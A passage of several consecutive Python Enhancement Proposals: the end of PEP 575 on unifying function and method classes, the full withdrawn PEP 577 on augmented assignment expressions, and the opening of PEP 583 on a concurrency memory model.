which are different anyway in other Python interpreters.
In particular, Python code which correctly runs on PyPy
will very likely continue to work with this PEP.
The standard classes and functions like
staticmethod, functools.partial or operator.methodcaller
do not need to change at all.
Changes to types and inspect
The proposed changes to types and inspect
are meant to minimize changes in behaviour.
However, it is unavoidable that some things change
and this can cause code which uses types or inspect to break.
In the Python standard library for example,
changes are needed in the doctest module because of this.
Also, tools which take various kinds of functions as input will need to deal
with the new function hierarchy and the possibility of custom
function classes.
Python functions
For Python functions, essentially nothing changes.
The attributes that existed before still exist and Python functions
can be initialized, called and turned into methods as before.
The name function is kept for backwards compatibility.
While it might make sense to change the name to something more
specific like python_function,
that would require a lot of annoying changes in documentation and testsuites.
Built-in functions of a module
Also for built-in functions, nothing changes.
We keep the old behaviour that such functions do not bind as methods.
This is a consequence of the fact that __self__ is set to the module.
Built-in bound and unbound methods
The types of built-in bound and unbound methods will change.
However, this does not affect calling such methods
because the protocol in base_function.__call__
(in particular the handling of __objclass__ and self slicing)
was specifically designed to be backwards compatible.
All attributes which existed before (like __objclass__ and __self__)
still exist.
New attributes
Some objects get new special double-underscore attributes.
For example, the new attribute __parent__ appears on
all built-in functions and all methods get a __func__ attribute.
The fact that __self__ is now a special read-only attribute
for Python functions caused trouble in [4].
Generally, we expect that not much will break though.
method_descriptor and PyDescr_NewMethod
The class method_descriptor and the constructor PyDescr_NewMethod
should be deprecated.
They are no longer used by CPython itself but are still supported.
Two-phase Implementation
TODO: this section is optional.
If this PEP is accepted, it should
be decided whether to apply this two-phase implementation or not.
As mentioned above, the changes to types and inspect can break some
existing code.
In order to further minimize breakage, this PEP could be implemented
in two phases.
Phase one: keep existing classes but add base classes
Initially, implement the base_function class
and use it as common base class but otherwise keep the existing classes
(but not their implementation).
In this proposal, the class hierarchy would become:
object
|
|
base_function
/ | \
/ | \
/ | \
cfunction | defined_function
| | | \
| | bound_method \
| | \
| method_descriptor function
|
builtin_function_or_method
The leaf classes builtin_function_or_method, method_descriptor,
bound_method and function correspond to the existing classes
(with method renamed to bound_method).
Automatically created functions created in modules become instances
of builtin_function_or_method.
Unbound methods of extension types become instances of method_descriptor.
The class method_descriptor is a copy of cfunction except
that __get__ returns a builtin_function_or_method instead of a
bound_method.
The class builtin_function_or_method has the same C structure as a
bound_method, but it inherits from cfunction.
The __func__ attribute is not mandatory:
it is only defined when binding a method_descriptor.
We keep the implementation of the inspect functions as they are.
Because of this and because the existing classes are kept,
backwards compatibility is ensured for code doing type checks.
Since showing an actual DeprecationWarning would affect a lot
of correctly-functioning code,
any deprecations would only appear in the documentation.
Another reason is that it is hard to show warnings for calling isinstance(x, t)
(but it could be done using __instancecheck__ hacking)
and impossible for type(x) is t.
Phase two
Phase two is what is actually described in the rest of this PEP.
In terms of implementation,
it would be a relatively small change compared to phase one.
Reference Implementation
Most of this PEP has been implemented for CPython at
https://github.com/jdemeyer/cpython/tree/pep575
There are four steps, corresponding to the commits on that branch.
After each step, CPython is in a mostly working state.
Add the base_function class and make it a subclass for cfunction.
This is by far the biggest step as the complete __call__ protocol
is implemented in this step.
Rename method to bound_method and make it a subclass of base_function.
Change unbound methods of extension types to be instances of cfunction
such that bound methods of extension types are also instances of bound_method.
Implement defined_function and function.
Changes to other parts of Python, such as the standard library and testsuite.
Appendix: current situation
NOTE:
This section is more useful during the draft period of the PEP,
so feel free to remove this once the PEP has been accepted.
For reference, we describe in detail the relevant existing classes in CPython 3.7.
Each of the classes involved is an “orphan” class
(no non-trivial subclasses nor superclasses).
builtin_function_or_method: built-in functions and bound methods
These are of type PyCFunction_Type
with structure PyCFunctionObject:
typedef struct {
PyObject_HEAD
PyMethodDef *m_ml; /* Description of the C function to call */
PyObject *m_self; /* Passed as 'self' arg to the C func, can be NULL */
PyObject *m_module; /* The __module__ attribute, can be anything */
PyObject *m_weakreflist; /* List of weak references */
} PyCFunctionObject;
struct PyMethodDef {
const char *ml_name; /* The name of the built-in function/method */
PyCFunction ml_meth; /* The C function that implements it */
int ml_flags; /* Combination of METH_xxx flags, which mostly
describe the args expected by the C func */
const char *ml_doc; /* The __doc__ attribute, or NULL */
};
where PyCFunction is a C function pointer (there are various forms of this, the most basic
takes two arguments for self and *args).
This class is used both for functions and bound methods:
for a method, the m_self slot points to the object:
>>> dict(foo=42).get
<built-in method get of dict object at 0x...>
>>> dict(foo=42).get.__self__
{'foo': 42}
In some cases, a function is considered a “method” of the module defining it:
>>> import os
>>> os.kill
<built-in function kill>
>>> os.kill.__self__
<module 'posix' (built-in)>
method_descriptor: built-in unbound methods
These are of type PyMethodDescr_Type
with structure PyMethodDescrObject:
typedef struct {
PyDescrObject d_common;
PyMethodDef *d_method;
} PyMethodDescrObject;
typedef struct {
PyObject_HEAD
PyTypeObject *d_type;
PyObject *d_name;
PyObject *d_qualname;
} PyDescrObject;
function: Python functions
These are of type PyFunction_Type
with structure PyFunctionObject:
typedef struct {
PyObject_HEAD
PyObject *func_code; /* A code object, the __code__ attribute */
PyObject *func_globals; /* A dictionary (other mappings won't do) */
PyObject *func_defaults; /* NULL or a tuple */
PyObject *func_kwdefaults; /* NULL or a dict */
PyObject *func_closure; /* NULL or a tuple of cell objects */
PyObject *func_doc; /* The __doc__ attribute, can be anything */
PyObject *func_name; /* The __name__ attribute, a string object */
PyObject *func_dict; /* The __dict__ attribute, a dict or NULL */
PyObject *func_weakreflist; /* List of weak references */
PyObject *func_module; /* The __module__ attribute, can be anything */
PyObject *func_annotations; /* Annotations, a dict or NULL */
PyObject *func_qualname; /* The qualified name */
/* Invariant:
* func_closure contains the bindings for func_code->co_freevars, so
* PyTuple_Size(func_closure) == PyCode_GetNumFree(func_code)
* (func_closure may be NULL if PyCode_GetNumFree(func_code) == 0).
*/
} PyFunctionObject;
In Python 3, there is no “unbound method” class:
an unbound method is just a plain function.
method: Python bound methods
These are of type PyMethod_Type
with structure PyMethodObject:
typedef struct {
PyObject_HEAD
PyObject *im_func; /* The callable object implementing the method */
PyObject *im_self; /* The instance it is bound to */
PyObject *im_weakreflist; /* List of weak references */
} PyMethodObject;
References
[1] (1, 2)
Cython (http://cython.org/)
[2]
Python bug 30071, Duck-typing inspect.isfunction() (https://bugs.python.org/issue30071)
[3]
Python bug 33261, inspect.isgeneratorfunction fails on hand-created methods
(https://bugs.python.org/issue33261 and https://github.com/python/cpython/pull/6448)
[4]
Python bug 33265, contextlib.ExitStack abuses __self__
(https://bugs.python.org/issue33265 and https://github.com/python/cpython/pull/6456)
[5]
PyMethodDef documentation (https://docs.python.org/3.7/c-api/structures.html#c.PyMethodDef)
[6]
PEP proposal: unifying function/method classes (https://mail.python.org/pipermail/python-ideas/2018-March/049398.html)
Copyright
This document has been placed in the public domain.
| Withdrawn | PEP 575 – Unifying function/method classes | Standards Track | Reorganize the class hierarchy for functions and methods
with the goal of reducing the difference between
built-in functions (implemented in C) and Python functions.
Mainly, make built-in functions behave more like Python functions
without sacrificing performance. |
PEP 577 – Augmented Assignment Expressions
Author:
Alyssa Coghlan <ncoghlan at gmail.com>
Status:
Withdrawn
Type:
Standards Track
Created:
14-May-2018
Python-Version:
3.8
Post-History:
22-May-2018
Table of Contents
PEP Withdrawal
Abstract
Syntax and semantics
Augmented assignment expressions
Adding an inline assignment operator
Assignment operator precedence
Augmented assignment to names in block scopes
Augmented assignment to names in scoped expressions
Design discussion
Allowing complex assignment targets
Augmented assignment or name binding only?
Postponing a decision on expression level target declarations
Ignoring scoped expressions when determining augmented assignment targets
Treating inline assignment as an augmented assignment variant
Disallowing augmented assignments in class level scoped expressions
Comparison operators vs assignment operators
Examples
Simplifying retry loops
Simplifying if-elif chains
Capturing intermediate values from comprehensions
Allowing lambda expressions to act more like re-usable code thunks
Relationship with PEP 572
Acknowledgements
References
Copyright
PEP Withdrawal
While working on this PEP, I realised that it didn’t really address what was
actually bothering me about PEP 572’s proposed scoping rules for previously
unreferenced assignment targets, and also had some significant undesirable
consequences (most notably, allowing >>= and <<= as inline augmented
assignment operators that meant something entirely different from the >=
and <= comparison operators).
I also realised that even without dedicated syntax of their own, PEP 572
technically allows inline augmented assignments to be written using the
operator module:
from operator import iadd
if (target := iadd(target, value)) < limit:
...
The restriction to simple names as inline assignment targets means that the
target expression can always be repeated without side effects, and thus avoids
the ambiguity that would arise from allowing actual embedded augmented
assignments (it’s still a bad idea, since it would almost certainly be hard
for humans to read, this note is just about the theoretical limits of language
level expressiveness).
Accordingly, I withdrew this PEP without submitting it for pronouncement. At
the time I also started writing a replacement PEP that focused specifically on
the handling of assignment targets which hadn’t already been declared as local
variables in the current scope (for both regular block scopes, and for scoped
expressions), but that draft never even reached a stage where I liked it
better than the ultimately accepted proposal in PEP 572, so it was never
posted anywhere, nor assigned a PEP number.
Abstract
This is a proposal to allow augmented assignments such as x += 1 to be
used as expressions, not just statements.
As part of this, NAME := EXPR is proposed as an inline assignment expression
that uses the new augmented assignment scoping rules, rather than implicitly
defining a new local variable name the way that existing name binding
statements do. The question of allowing expression level local variable
declarations at function scope is deliberately separated from the question of
allowing expression level name bindings, and deferred to a later PEP.
This PEP is a direct competitor to PEP 572 (although it borrows heavily from that
PEP’s motivation, and even shares the proposed syntax for inline assignments).
See Relationship with PEP 572 for more details on the connections between
the two PEPs.
To improve the usability of the new expressions, a semantic split is proposed
between the handling of augmented assignments in regular block scopes (modules,
classes, and functions), and the handling of augmented assignments in scoped
expressions (lambda expressions, generator expressions, and comprehensions),
such that all inline assignments default to targeting the nearest containing
block scope.
A new compile time TargetNameError is added as a subclass of SyntaxError
to handle cases where it is deemed to be currently unclear which target is
expected to be rebound by an inline assignment, or else the target scope
for the inline assignment is considered invalid for another reason.
Syntax and semantics
Augmented assignment expressions
The language grammar would be adjusted to allow augmented assignments to
appear as expressions, where the result of the augmented assignment
expression is the same post-calculation reference as is being bound to the
given target.
For example:
>>> n = 0
>>> n += 5
5
>>> n -= 2
3
>>> n *= 3
9
>>> n
9
For mutable targets, this means the result is always just the original object:
>>> seq = []
>>> seq_id = id(seq)
>>> seq += range(3)
[0, 1, 2]
>>> seq_id == id(seq)
True
Augmented assignments to attributes and container subscripts will be permitted,
with the result being the post-calculation reference being bound to the target,
just as it is for simple name targets:
def increment(self, step=1):
return self._value += step
In these cases, __getitem__ and __getattribute__ will not be called
after the assignment has already taken place (they will only be called as
needed to evaluate the in-place operation).
Adding an inline assignment operator
Given only the addition of augmented assignment expressions, it would be
possible to abuse a symbol like |= as a general purpose assignment
operator by defining a Target wrapper type that worked as follows:
>>> class Target:
... def __init__(self, value):
... self.value = value
... def __or__(self, other):
... return Target(other)
...
>>> x = Target(10)
>>> x.value
10
>>> x |= 42
<__main__.Target object at 0x7f608caa8048>
>>> x.value
42
This is similar to the way that storing a single reference in a list was long
used as a workaround for the lack of a nonlocal keyword, and can still be
used today (in combination with operator.itemsetter) to work around the
lack of expression level assignments.
Rather than requiring such workarounds, this PEP instead proposes that
PEP 572’s “NAME := EXPR” syntax be adopted as a new inline assignment
expression that uses the augmented assignment scoping rules described below.
This cleanly handles cases where only the new value is of interest, and the
previously bound value (if any) can just be discarded completely.
Note that for both simple names and complex assignment targets, the inline
assignment operator does not read the previous reference before assigning
the new one. However, when used at function scope (either directly or inside
a scoped expression), it does not implicitly define a new local variable,
and will instead raise TargetNameError (as described for augmented
assignments below).
Assignment operator precedence
To preserve the existing semantics of augmented assignment statements,
inline assignment operators will be defined as being of lower precedence
than all other operators, include the comma pseudo-operator. This ensures
that when used as a top level expression the entire right hand side of the
expression is still interpreted as the value to be processed (even when that
value is a tuple without parentheses).
The difference this introduces relative to PEP 572 is that where
(n := first, second) sets n = first in PEP 572, in this PEP it would set
n = (first, second), and getting the first meaning would require an extra
set of parentheses (((n := first), second)).
PEP 572 quite reasonably notes that this results in ambiguity when assignment
expressions are used as function call arguments. This PEP resolves that concern
a different way by requiring that assignment expressions be parenthesised
when used as arguments to a function call (unless they’re the sole argument).
This is a more relaxed version of the restriction placed on generator
expressions (which always require parentheses, except when they’re the sole
argument to a function call).
Augmented assignment to names in block scopes
No target name binding changes are proposed for augmented assignments at module
or class scope (this also includes code executed using “exec” or “eval”). These
will continue to implicitly declare a new local variable as the binding target
as they do today, and (if necessary) will be able to resolve the name from an
outer scope before binding it locally.
At function scope, augmented assignments will be changed to require that there
be either a preceding name binding or variable declaration to explicitly
establish the target name as being local to the function, or else an explicit
global or nonlocal declaration. TargetNameError, a new
SyntaxError subclass, will be raised at compile time if no such binding or
declaration is present.
For example, the following code would compile and run as it does today:
x = 0
x += 1 # Sets global "x" to 1
class C:
x += 1 # Sets local "x" to 2, leaves global "x" alone
def local_target():
x = 0
x += 1 # Sets local "x" to 1, leaves global "x" alone
def global_target():
global x
x += 1 # Increments global "x" each time this runs
def nonlocal_target():
x = 0
def g():
nonlocal x
x += 1 # Increments "x" in outer scope each time this runs
return x
return g
The follow examples would all still compile and then raise an error at runtime
as they do today:
n += 1 # Raises NameError at runtime
class C:
n += 1 # Raises NameError at runtime
def missing_global():
global n
n += 1 # Raises NameError at runtime
def delayed_nonlocal_initialisation():
def f():
nonlocal n
n += 1
f() # Raises NameError at runtime
n = 0
def skipped_conditional_initialisation():
if False:
n = 0
n += 1 # Raises UnboundLocalError at runtime
def local_declaration_without_initial_assignment():
n: typing.Any
n += 1 # Raises UnboundLocalError at runtime
Whereas the following would raise a compile time DeprecationWarning
initially, and eventually change to report a compile time TargetNameError:
def missing_target():
x += 1 # Compile time TargetNameError due to ambiguous target scope
# Is there a missing initialisation of "x" here? Or a missing
# global or nonlocal declaration?
As a conservative implementation approach, the compile time function name
resolution change would be introduced as a DeprecationWarning in Python
3.8, and then converted to TargetNameError in Python 3.9. This avoids
potential problems in cases where an unused function would currently raise
UnboundLocalError if it was ever actually called, but the code is actually
unused - converting that latent runtime defect to a compile time error qualifies
as a backwards incompatible change that requires a deprecation period.
When augmented assignments are used as expressions in function scope (rather
than as standalone statements), there aren’t any backwards compatibility
concerns, so the compile time name binding checks would be enforced immediately
in Python 3.8.
Similarly, the new inline assignment expressions would always require explicit
predeclaration of their target scope when used as part of a function, at least
for Python 3.8. (See the design discussion section for notes on potentially
revisiting that restriction in the future).
Augmented assignment to names in scoped expressions
Scoped expressions is a new collective term being proposed for expressions that
introduce a new nested scope of execution, either as an intrinsic part of their
operation (lambda expressions, generator expressions), or else as a way of
hiding name binding operations from the containing scope (container
comprehensions).
Unlike regular functions, these scoped expressions can’t include explicit
global or nonlocal declarations to rebind names directly in an outer
scope.
Instead, their name binding semantics for augmented assignment expressions would
be defined as follows:
augmented assignment targets used in scoped expressions are expected to either
be already bound in the containing block scope, or else have their scope
explicitly declared in the containing block scope. If no suitable name
binding or declaration can be found in that scope, then TargetNameError
will be raised at compile time (rather than creating a new binding within
the scoped expression).
if the containing block scope is a function scope, and the target name is
explicitly declared as global or nonlocal, then it will be use the
same scope declaration in the body of the scoped expression
if the containing block scope is a function scope, and the target name is
a local variable in that function, then it will be implicitly declared as
nonlocal in the body of the scoped expression
if the containing block scope is a class scope, than TargetNameError will
always be raised, with a dedicated message indicating that combining class
scopes with augmented assignments in scoped expressions is not currently
permitted.
if a name is declared as a formal parameter (lambda expressions), or as an
iteration variable (generator expressions, comprehensions), then that name
is considered local to that scoped expression, and attempting to use it as
the target of an augmented assignment operation in that scope, or any nested
scoped expression, will raise TargetNameError (this is a restriction that
could potentially be lifted later, but is being proposed for now to simplify
the initial set of compile time and runtime semantics that needs to be
covered in the language reference and handled by the compiler and interpreter)
For example, the following code would work as shown:
>>> global_target = 0
>>> incr_global_target = lambda: global_target += 1
>>> incr_global_target()
1
>>> incr_global_target()
2
>>> global_target
2
>>> def cumulative_sums(data, start=0)
... total = start
... yield from (total += value for value in data)
... return total
...
>>> print(list(cumulative_sums(range(5))))
[0, 1, 3, 6, 10]
While the following examples would all raise TargetNameError:
class C:
cls_target = 0
incr_cls_target = lambda: cls_target += 1 # Error due to class scope
def missing_target():
incr_x = lambda: x += 1 # Error due to missing target "x"
def late_target():
incr_x = lambda: x += 1 # Error due to "x" being declared after use
x = 1
lambda arg: arg += 1 # Error due to attempt to target formal parameter
[x += 1 for x in data] # Error due to attempt to target iteration variable
As augmented assignments currently can’t appear inside scoped expressions, the
above compile time name resolution exceptions would be included as part of the
initial implementation rather than needing to be phased in as a potentially
backwards incompatible change.
Design discussion
Allowing complex assignment targets
The initial drafts of this PEP kept PEP 572’s restriction to single name targets
when augmented assignments were used as expressions, allowing attribute and
subscript targets solely for the statement form.
However, enforcing that required varying the permitted targets based on whether
or not the augmented assignment was a top level expression or not, as well as
explaining why n += 1, (n += 1), and self.n += 1 were all legal,
but (self.n += 1) was prohibited, so the proposal was simplified to allow
all existing augmented assignment targets for the expression form as well.
Since this PEP defines TARGET := EXPR as a variant on augmented assignment,
that also gained support for assignment and subscript targets.
Augmented assignment or name binding only?
PEP 572 makes a reasonable case that the potential use cases for inline
augmented assignment are notably weaker than those for inline assignment in
general, so it’s acceptable to require that they be spelled as x := x + 1,
bypassing any in-place augmented assignment methods.
While this is at least arguably true for the builtin types (where potential
counterexamples would probably need to focus on set manipulation use cases
that the PEP author doesn’t personally have), it would also rule out more
memory intensive use cases like manipulation of NumPy arrays, where the data
copying involved in out-of-place operations can make them impractical as
alternatives to their in-place counterparts.
That said, this PEP mainly exists because the PEP author found the inline
assignment proposal much easier to grasp as “It’s like +=, only skipping
the addition step”, and also liked the way that that framing provides an
actual semantic difference between NAME = EXPR and NAME := EXPR at
function scope.
That difference in target scoping behaviour means that the NAME := EXPR
syntax would be expected to have two primary use cases:
as a way of allowing assignments to be embedded as an expression in an if
or while statement, or as part of a scoped expression
as a way of requesting a compile time check that the target name be previously
declared or bound in the current function scope
At module or class scope, NAME = EXPR and NAME := EXPR would be
semantically equivalent due to the compiler’s lack of visibility into the set
of names that will be resolvable at runtime, but code linters and static
type checkers would be encouraged to enforce the same “declaration or assignment
required before use” behaviour for NAME := EXPR as the compiler would
enforce at function scope.
Postponing a decision on expression level target declarations
At least for Python 3.8, usage of inline assignments (whether augmented or not)
at function scope would always require a preceding name binding or scope
declaration to avoid getting TargetNameError, even when used outside a
scoped expression.
The intent behind this requirement is to clearly separate the following two
language design questions:
Can an expression rebind a name in the current scope?
Can an expression declare a new name in the current scope?
For module global scopes, the answer to both of those questions is unequivocally
“Yes”, because it’s a language level guarantee that mutating the globals()
dict will immediately impact the runtime module scope, and global NAME
declarations inside a function can have the same effect (as can importing the
currently executing module and modifying its attributes).
For class scopes, the answer to both questions is also “Yes” in practice,
although less unequivocally so, since the semantics of locals() are
currently formally unspecified. However, if the current behaviour of locals()
at class scope is taken as normative (as PEP 558 proposes), then this is
essentially the same scenario as manipulating the module globals, just using
locals() instead.
For function scopes, however, the current answers to these two questions are
respectively “Yes” and “No”. Expression level rebinding of function locals is
already possible thanks to lexically nested scopes and explicit nonlocal NAME
expressions. While this PEP will likely make expression level rebinding more
common than it is today, it isn’t a fundamentally new concept for the language.
By contrast, declaring a new function local variable is currently a statement
level action, involving one of:
an assignment statement (NAME = EXPR, OTHER_TARGET = NAME = EXPR, etc)
a variable declaration (NAME : EXPR)
a nested function definition
a nested class definition
a for loop
a with statement
an except clause (with limited scope of access)
The historical trend for the language has actually been to remove support for
expression level declarations of function local names, first with the
introduction of “fast locals” semantics (which made the introduction of names
via locals() unsupported for function scopes), and again with the hiding
of comprehension iteration variables in Python 3.0.
Now, it may be that in Python 3.9, we decide to revisit this question based on
our experience with expression level name binding in Python 3.8, and decide that
we really do want expression level function local variable declarations as well,
and that we want NAME := EXPR to be the way we spell that (rather than,
for example, spelling inline declarations more explicitly as
NAME := EXPR given NAME, which would permit them to carry type annotations,
and also permit them to declare new local variables in scoped expressions,
rather than having to pollute the namespace in their containing scope).
But the proposal in this PEP is that we explicitly give ourselves a full
release to decide how much we want that feature, and exactly where we find
its absence irritating. Python has survived happily without expression level
name bindings or declarations for decades, so we can afford to give ourselves
a couple of years to decide if we really want both of those, or if expression
level bindings are sufficient.
Ignoring scoped expressions when determining augmented assignment targets
When discussing possible binding semantics for PEP 572’s assignment expressions,
Tim Peters made a plausible case [1], [2], [3] for assignment expressions targeting
the containing block scope, essentially ignoring any intervening scoped
expressions.
This approach allows use cases like cumulative sums, or extracting the final
value from a generator expression to be written in a relatively straightforward
way:
total = 0
partial_sums = [total := total + value for value in data]
factor = 1
while any(n % (factor := p) == 0 for p in small_primes):
n //= factor
Guido also expressed his approval for this general approach [4].
The proposal in this PEP differs from Tim’s original proposal in three main
areas:
it applies the proposal to all augmented assignment operators, not just a
single new name binding operator
as far as is practical, it extends the augmented assignment requirement that
the name already be defined to the new name binding operator (raising
TargetNameError rather than implicitly declaring new local variables at
function scope)
it includes lambda expressions in the set of scopes that get ignored for
target name binding purposes, making this transparency to assignments common
to all of the scoped expressions rather than being specific to comprehensions
and generator expressions
With scoped expressions being ignored when calculating binding targets, it’s
once again difficult to detect the scoping difference between the outermost
iterable expressions in generator expressions and comprehensions (you have to
mess about with either class scopes or attempting to rebind iteration Variables
to detect it), so there’s also no need to tinker with that.
Treating inline assignment as an augmented assignment variant
One of the challenges with PEP 572 is the fact that NAME = EXPR and
NAME := EXPR are entirely semantically equivalent at every scope. This
makes the two forms hard to teach, since there’s no inherent nudge towards
choosing one over the other at the statement level, so you end up having to
resort to “NAME = EXPR is preferred because it’s been around longer”
(and PEP 572 proposes to enforce that historical idiosyncrasy at the compiler
level).
That semantic equivalence is difficult to avoid at module and class scope while
still having if NAME := EXPR: and while NAME := EXPR: work sensibly, but
at function scope the compiler’s comprehensive view of all local names makes
it possible to require that the name be assigned or declared before use,
providing a reasonable incentive to continue to default to using the
NAME = EXPR form when possible, while also enabling the use of the
NAME := EXPR as a kind of simple compile time assertion (i.e. explicitly
indicating that the targeted name has already been bound or declared and hence
should already be known to the compiler).
If Guido were to declare that support for inline declarations was a hard
design requirement, then this PEP would be updated to propose that
EXPR given NAME also be introduced as a way to support inline name declarations
after arbitrary expressions (this would allow the inline name declarations to be
deferred until the end of a complex expression rather than needing to be
embedded in the middle of it, and PEP 8 would gain a recommendation encouraging
that style).
Disallowing augmented assignments in class level scoped expressions
While modern classes do define an implicit closure that’s visible to method
implementations (in order to make __class__ available for use in zero-arg
super() calls), there’s no way for user level code to explicitly add
additional names to that scope.
Meanwhile, attributes defined in a class body are ignored for the purpose of
defining a method’s lexical closure, which means adding them there wouldn’t
work at an implementation level.
Rather than trying to resolve that inherent ambiguity, this PEP simply
prohibits such usage, and requires that any affected logic be written somewhere
other than directly inline in the class body (e.g. in a separate helper
function).
Comparison operators vs assignment operators
The OP= construct as an expression currently indicates a comparison
operation:
x == y # Equals
x >= y # Greater-than-or-equal-to
x <= y # Less-than-or-equal-to
Both this PEP and PEP 572 propose adding at least one operator that’s somewhat
similar in appearance, but defines an assignment instead:
x := y # Becomes
This PEP then goes much further and allows all 13 augmented assignment symbols
to be uses as binary operators:
x += y # In-place add
x -= y # In-place minus
x *= y # In-place multiply
x @= y # In-place matrix multiply
x /= y # In-place division
x //= y # In-place int division
x %= y # In-place mod
x &= y # In-place bitwise and
x |= y # In-place bitwise or
x ^= y # In-place bitwise xor
x <<= y # In-place left shift
x >>= y # In-place right shift
x **= y # In-place power
Of those additional binary operators, the most questionable would be the
bitshift assignment operators, since they’re each only one doubled character
away from one of the inclusive ordered comparison operators.
Examples
Simplifying retry loops
There are currently a few different options for writing retry loops, including:
# Post-decrementing a counter
remaining_attempts = MAX_ATTEMPTS
while remaining_attempts:
remaining_attempts -= 1
try:
result = attempt_operation()
except Exception as exc:
continue # Failed, so try again
log.debug(f"Succeeded after {attempts} attempts")
break # Success!
else:
raise OperationFailed(f"Failed after {MAX_ATTEMPTS} attempts") from exc
# Loop-and-a-half with a pre-incremented counter
attempt = 0
while True:
attempts += 1
if attempts > MAX_ATTEMPTS:
raise OperationFailed(f"Failed after {MAX_ATTEMPTS} attempts") from exc
try:
result = attempt_operation()
except Exception as exc:
continue # Failed, so try again
log.debug(f"Succeeded after {attempts} attempts")
break # Success!
Each of the available options hides some aspect of the intended loop structure
inside the loop body, whether that’s the state modification, the exit condition,
or both.
The proposal in this PEP allows both the state modification and the exit
condition to be included directly in the loop header:
attempt = 0
while (attempt += 1) <= MAX_ATTEMPTS:
try:
result = attempt_operation()
except Exception as exc:
continue # Failed, so try again
log.debug(f"Succeeded after {attempts} attempts")
break # Success!
else:
raise OperationFailed(f"Failed after {MAX_ATTEMPTS} attempts") from exc
Simplifying if-elif chains
if-elif chains that need to rebind the checked condition currently need to
be written using nested if-else statements:
m = pattern.match(data)
if m:
...
else:
m = other_pattern.match(data)
if m:
...
else:
m = yet_another_pattern.match(data)
if m:
...
else:
...
As with PEP 572, this PEP allows the else/if portions of that chain to be
condensed, making their consistent and mutually exclusive structure more
readily apparent:
m = pattern.match(data)
if m:
...
elif m := other_pattern.match(data):
...
elif m := yet_another_pattern.match(data):
...
else:
...
Unlike PEP 572, this PEP requires that the assignment target be explicitly
indicated as local before the first use as a := target, either by
binding it to a value (as shown above), or else by including an appropriate
explicit type declaration:
m: typing.re.Match
if m := pattern.match(data):
...
elif m := other_pattern.match(data):
...
elif m := yet_another_pattern.match(data):
...
else:
...
Capturing intermediate values from comprehensions
The proposal in this PEP makes it straightforward to capture and reuse
intermediate values in comprehensions and generator expressions by
exporting them to the containing block scope:
factor: int
while any(n % (factor := p) == 0 for p in small_primes):
n //= factor
total = 0
partial_sums = [total += value for value in data]
Allowing lambda expressions to act more like re-usable code thunks
This PEP allows the classic closure usage example:
def make_counter(start=0):
x = start
def counter(step=1):
nonlocal x
x += step
return x
return counter
To be abbreviated as:
def make_counter(start=0):
x = start
return lambda step=1: x += step
While the latter form is still a conceptually dense piece of code, it can be
reasonably argued that the lack of boilerplate (where the “def”, “nonlocal”,
and “return” keywords and two additional repetitions of the “x” variable name
have been replaced with the “lambda” keyword) may make it easier to read in
practice.
Relationship with PEP 572
The case for allowing inline assignments at all is made in PEP 572. This
competing PEP was initially going to propose an alternate surface syntax
(EXPR given NAME = EXPR), while retaining the expression semantics from
PEP 572, but that changed when discussing one of the initial motivating use
cases for allowing embedded assignments at all: making it possible to easily
calculate cumulative sums in comprehensions and generator expressions.
As a result of that, and unlike PEP 572, this PEP focuses primarily on use
cases for inline augmented assignment. It also has the effect of converting
cases that currently inevitably raise UnboundLocalError at function call
time to report a new compile time TargetNameError.
New syntax for a name rebinding expression (NAME := TARGET) is then added
not only to handle the same use cases as are identified in PEP 572, but also
as a lower level primitive to help illustrate, implement and explain
the new augmented assignment semantics, rather than being the sole change being
proposed.
The author of this PEP believes that this approach makes the value of the new
flexibility in name rebinding clearer, while also mitigating many of the
potential concerns raised with PEP 572 around explaining when to use
NAME = EXPR over NAME := EXPR (and vice-versa), without resorting to
prohibiting the bare statement form of NAME := EXPR outright (such
that NAME := EXPR is a compile error, but (NAME := EXPR) is permitted).
Acknowledgements
The PEP author wishes to thank Chris Angelico for his work on PEP 572, and his
efforts to create a coherent summary of the great many sprawling discussions
that spawned on both python-ideas and python-dev, as well as Tim Peters for
the in-depth discussion of parent local scoping that prompted the above
scoping proposal for augmented assignments inside scoped expressions.
Eric Snow’s feedback on a pre-release version of this PEP helped make it
significantly more readable.
References
[1]
The beginning of Tim’s genexp & comprehension scoping thread
(https://mail.python.org/pipermail/python-ideas/2018-May/050367.html)
[2]
Reintroducing the original cumulative sums use case
(https://mail.python.org/pipermail/python-ideas/2018-May/050544.html)
[3]
Tim’s language reference level explanation of his proposed scoping semantics
(https://mail.python.org/pipermail/python-ideas/2018-May/050729.html)
[4]
Guido’s endorsement of Tim’s proposed genexp & comprehension scoping
(https://mail.python.org/pipermail/python-ideas/2018-May/050411.html)
Copyright
This document has been placed in the public domain.
| Withdrawn | PEP 577 – Augmented Assignment Expressions | Standards Track | This is a proposal to allow augmented assignments such as x += 1 to be
used as expressions, not just statements. |
PEP 583 – A Concurrency Memory Model for Python
Author:
Jeffrey Yasskin <jyasskin at google.com>
Status:
Withdrawn
Type:
Informational
Created:
22-Mar-2008
Post-History:
Table of Contents
Abstract
Rationale
A couple definitions
Two simple memory models
Sequential Consistency
Happens-before consistency
An example
Surprising behaviors with races
Zombie values
Inconsistent Orderings
A happens-before race that’s not a sequentially-consistent race
Self-justifying values
Uninitialized values (direct)
Uninitialized values (flag)
Inconsistent guarantees from relying on data dependencies
The rules for Python
Data-race-free programs are sequentially consistent
No security holes from out-of-thin-air reads
Restrict reorderings instead of defining happens-before
Atomic, unordered assignments
Two tiers of guarantees
Sequential Consistency
Adapt the x86 model
Upgrading or downgrading to an alternate model
Implementation Details
CPython
PyPy
Jython
IronPython
References
Acknowledgements
Copyright
Abstract
This PEP describes how Python programs may behave in the presence of
concurrent reads and writes to shared variables from multiple threads.
We use a happens before relation to define when variable accesses
are ordered or concurrent. Nearly all programs should simply use locks
to guard their shared variables, and this PEP highlights some of the
strange things that can happen when they don’t, but programmers often
assume that it’s ok to do “simple” things without locking, and it’s
somewhat unpythonic to let the language surprise them. Unfortunately,
avoiding surprise often conflicts with making Python run quickly, so
this PEP tries to find a good tradeoff between the two.
Rationale
So far, we have 4 major Python implementations – CPython, Jython,
IronPython, and PyPy – as well as lots of minor ones. Some of
these already run on platforms that do aggressive optimizations. In
general, these optimizations are invisible within a single thread of
execution, but they can be visible to other threads executing
concurrently. CPython currently uses a GIL to ensure that other
threads see the results they expect, but this limits it to a single
processor. Jython and IronPython run on Java’s or .NET’s threading
system respectively, which allows them to take advantage of more cores
but can also show surprising values to other threads.
So that threaded Python programs continue to be portable between
implementations, implementers and library authors need to agree on
some ground rules.
A couple definitions
VariableA name that refers to an object. Variables are generally
introduced by assigning to them, and may be destroyed by passing
them to del. Variables are fundamentally mutable, while
objects may not be. There are several varieties of variables:
